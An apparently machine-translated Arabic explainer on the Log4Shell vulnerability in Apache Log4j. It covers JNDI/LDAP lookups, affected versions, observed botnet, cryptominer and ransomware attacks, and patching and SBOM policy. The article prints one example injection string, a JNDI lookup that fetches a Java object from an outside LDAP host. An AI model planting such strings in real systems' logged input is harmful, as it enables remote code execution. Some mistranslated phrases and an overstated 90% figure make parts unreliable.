جدول المحتويات[يخفي][يعرض]
في أواخر تشرين الثاني (نوفمبر) 2021 ، اكتشفنا تهديدًا كبيرًا للأمن السيبراني. من المحتمل أن يؤثر هذا الاستغلال على ملايين أنظمة الكمبيوتر في جميع أنحاء العالم.
هذا دليل حول ثغرة Log4j وكيف ترك عيب في التصميم تم التغاضي عنه أكثر من 90 ٪ من خدمات الكمبيوتر في العالم عرضة للهجوم.
Apache Log4j هي أداة مساعدة للتسجيل مفتوحة المصدر تعتمد على Java تم تطويرها بواسطة Apache Software Foundation. تمت كتابته في الأصل بواسطة Ceki Gülcü في عام 2001 ، وهو الآن جزء من Apache Logging Services ، وهو مشروع تابع لمؤسسة Apache Software Foundation.
تستخدم الشركات حول العالم مكتبة Log4j لتمكين تسجيل الدخول إلى تطبيقاتهم. في الواقع ، مكتبة Java موجودة في كل مكان ، يمكنك العثور عليها في تطبيقات من Amazon و Microsoft و Google والمزيد.
إن بروز المكتبة يعني أن أي عيب محتمل في الشفرة يمكن أن يترك ملايين أجهزة الكمبيوتر عرضة للقرصنة. في 24 نوفمبر 2021 ، أ سحابة الأمن اكتشف باحث يعمل لدى علي بابا عيبًا رهيبًا.
كانت ثغرة Log4j ، المعروفة أيضًا باسم Log4Shell ، موجودة دون أن يلاحظها أحد منذ عام 2013. سمحت الثغرة الأمنية للجهات الفاعلة الخبيثة بتشغيل تعليمات برمجية على الأنظمة المتأثرة التي تشغل Log4j. تم الكشف عنها علنًا في 9 ديسمبر 2021
يسمي خبراء الصناعة عيب Log4Shell the أكبر نقطة ضعف في الذاكرة الحديثة.
في الأسبوع الذي تلا نشر الثغرة الأمنية ، اكتشفت فرق الأمن السيبراني ملايين الهجمات. حتى أن بعض الباحثين لاحظوا معدل أكثر من مائة هجوم في الدقيقة.
كيف تعمل؟
لفهم سبب خطورة Log4Shell ، نحتاج إلى فهم ما هو قادر عليه.
تسمح الثغرة الأمنية Log4Shell بتنفيذ تعليمات برمجية عشوائية ، مما يعني بشكل أساسي أنه يمكن للمهاجم تشغيل أي أمر أو رمز على جهاز مستهدف.
كيف يتم تحقيق ذلك؟
أولا ، نحن بحاجة إلى فهم ما هو JNDI.
Java Naming and Directory Interface (JNDI) هي خدمة Java تسمح لبرامج Java باكتشاف البيانات والموارد والبحث عنها عبر الاسم. تعد خدمات الدليل هذه مهمة لأنها توفر مجموعة منظمة من السجلات للمطورين للرجوع إليها بسهولة عند إنشاء التطبيقات.
يمكن لـ JNDI استخدام بروتوكولات مختلفة للوصول إلى دليل معين. أحد هذه البروتوكولات هو بروتوكول الوصول الخفيف إلى الدليل ، أو LDAP.
عند تسجيل سلسلة ، log4j ينفذ استبدالات سلسلة عندما يواجهون تعبيرات من النموذج ${prefix:name}
.
على سبيل المثال، Text: ${java:version}
قد يتم تسجيله كنص: إصدار Java 1.8.0_65. هذه الأنواع من البدائل شائعة.
يمكن أن يكون لدينا أيضًا تعبيرات مثل Text: ${jndi:ldap://example.com/file}
الذي يستخدم نظام JNDI لتحميل كائن Java من عنوان URL من خلال بروتوكول LDAP.
يؤدي هذا إلى تحميل البيانات الواردة من عنوان URL هذا إلى الجهاز بشكل فعال. يمكن لأي مخترق محتمل استضافة تعليمات برمجية ضارة على عنوان URL عام وانتظار الأجهزة التي تستخدم Log4j لتسجيلها.
نظرًا لأن محتويات رسائل السجل تحتوي على بيانات يتحكم فيها المستخدم ، يمكن للقراصنة إدخال مراجع JNDI الخاصة بهم والتي تشير إلى وحدات خدمة LDAP التي يتحكمون فيها. يمكن أن تكون خوادم LDAP مليئة بكائنات Java الخبيثة التي يمكن لـ JNDI تنفيذها من خلال الثغرة الأمنية.
ما يزيد الأمر سوءًا هو أنه لا يهم ما إذا كان التطبيق تطبيقًا من جانب الخادم أو تطبيق من جانب العميل.
طالما أن هناك طريقة للمسجل لقراءة الشفرة الخبيثة للمهاجم ، فإن التطبيق لا يزال مفتوحًا للاستغلال.
من المتضرر؟
تؤثر الثغرة الأمنية على جميع الأنظمة والخدمات التي تستخدم APache Log4j ، مع الإصدارات 2.0 حتى 2.14.1 وتشمل.
ينصح العديد من خبراء الأمن بأن الثغرة الأمنية قد تؤثر على عدد من التطبيقات التي تستخدم Java.
تم اكتشاف الخلل لأول مرة في لعبة فيديو Minecraft المملوكة لشركة Microsoft. حثت Microsoft مستخدميها على ترقية برنامج Minecraft إصدار Java الخاص بهم لمنع أي مخاطر.
يقول جين إيسترلي ، مدير وكالة الأمن السيبراني وأمن البنية التحتية (CISA) إن البائعين لديهم مسؤولية كبيرة لمنع المستخدمين النهائيين من الجهات الضارة من استغلال هذه الثغرة الأمنية.
"يجب أن يتواصل البائعون أيضًا مع عملائهم للتأكد من أن المستخدمين النهائيين يعرفون أن منتجهم يحتوي على هذه الثغرة الأمنية ويجب أن يعطي الأولوية لتحديثات البرامج."
وبحسب ما ورد بدأت الهجمات بالفعل. لاحظت شركة Symantec ، وهي شركة توفر برامج للأمن السيبراني ، عددًا متنوعًا من طلبات الهجوم.
فيما يلي بعض الأمثلة على أنواع الهجمات التي اكتشفها الباحثون:
- إقناعا
الروبوتات عبارة عن شبكة من أجهزة الكمبيوتر التي تخضع لسيطرة طرف مهاجم واحد. فهي تساعد في تنفيذ هجمات DDoS وسرقة البيانات وعمليات الاحتيال الأخرى. لاحظ الباحثون الروبوتات Muhstik في نصوص قذيفة تم تنزيلها من استغلال Log4j.
- XMRig عامل منجم طروادة
XMRig هو عامل منجم مفتوح المصدر للعملات المشفرة يستخدم وحدات المعالجة المركزية (CPU) لتعدين رمز Monero. يمكن لمجرمي الإنترنت تثبيت XMRig على أجهزة الأشخاص حتى يتمكنوا من استخدام قوة المعالجة الخاصة بهم دون علمهم.
- خونساري رانسومواري
تشير برامج الفدية إلى أحد أشكال البرامج الضارة المصممة لـ تشفير الملفات على جهاز كمبيوتر. يمكن للمهاجمين بعد ذلك المطالبة بالدفع مقابل إعادة الوصول إلى الملفات المشفرة. اكتشف الباحثون برنامج الفدية Khonsari في هجمات Log4Shell. إنهم يستهدفون خوادم Windows ويستفيدون من .NET framework.
ما يحدث بعد ذلك؟
يتوقع الخبراء أن الأمر قد يستغرق شهورًا أو ربما سنوات لإصلاح الفوضى التي أحدثتها ثغرة Log4J بشكل كامل.
تتضمن هذه العملية تحديث كل نظام متأثر بنسخة مصححة. حتى إذا تم تصحيح جميع هذه الأنظمة ، فلا يزال هناك تهديد يلوح في الأفق من الأبواب الخلفية المحتملة التي ربما أضافها المتسللون بالفعل إلى النافذة التي كانت الخوادم مفتوحة للهجوم.
كثير الحلول والمعالجات موجودة لمنع استغلال هذا الخطأ للتطبيقات. غيّر إصدار Log4j الجديد 2.15.0-rc1 الإعدادات المختلفة للتخفيف من هذه الثغرة الأمنية.
سيتم تعطيل كل الميزات التي تستخدم JNDI افتراضيًا كما تم تقييد عمليات البحث عن بُعد أيضًا. سيساعد تعطيل ميزة البحث في إعداد Log4j على تقليل مخاطر عمليات الاستغلال المحتملة.
خارج Log4j ، لا تزال هناك حاجة إلى خطة أوسع لمنع استغلال المصادر المفتوحة.
في وقت سابق من شهر مايو ، أصدر البيت الأبيض ملف أمر تنفيذي التي تهدف إلى تحسين الأمن السيبراني الوطني. تضمنت شرطًا لقائمة مواد البرمجيات (SBOM) والتي كانت في الأساس وثيقة رسمية تحتوي على قائمة بكل عنصر مطلوب لبناء التطبيق.
يتضمن هذا أجزاء مثل المصدر المفتوح الحزم والتبعيات وواجهات برمجة التطبيقات المستخدمة في التطوير. على الرغم من أن فكرة SBOMs مفيدة للشفافية ، فهل ستساعد المستهلك حقًا؟
قد تكون ترقية التبعيات كثيرًا من المتاعب. يمكن للشركات اختيار دفع أي غرامات بدلاً من المخاطرة بإضاعة الوقت الإضافي في العثور على حزم بديلة. ربما لن تكون هذه SBOMs مفيدة إلا إذا كانت نطاق يقتصر أكثر.
وفي الختام
تعد مشكلة Log4j أكثر من مجرد مشكلة فنية للمؤسسات.
يجب أن يكون قادة الأعمال على دراية بالمخاطر المحتملة التي يمكن أن تحدث عندما تعتمد خوادمهم أو منتجاتهم أو خدماتهم على رمز لا يحتفظون به هم أنفسهم.
دائمًا ما يأتي الاعتماد على تطبيقات مفتوحة المصدر وتطبيقات الجهات الخارجية مع قدر من المخاطرة. يجب على الشركات التفكير في وضع استراتيجيات للتخفيف من المخاطر قبل ظهور التهديدات الجديدة.
يعتمد جزء كبير من الويب على برامج مفتوحة المصدر يديرها آلاف المتطوعين في جميع أنحاء العالم.
إذا أردنا الحفاظ على الويب في مكان آمن ، فيجب على الحكومات والشركات الاستثمار في تمويل جهود المصادر المفتوحة ووكالات الأمن السيبراني مثل CISA.
اترك تعليق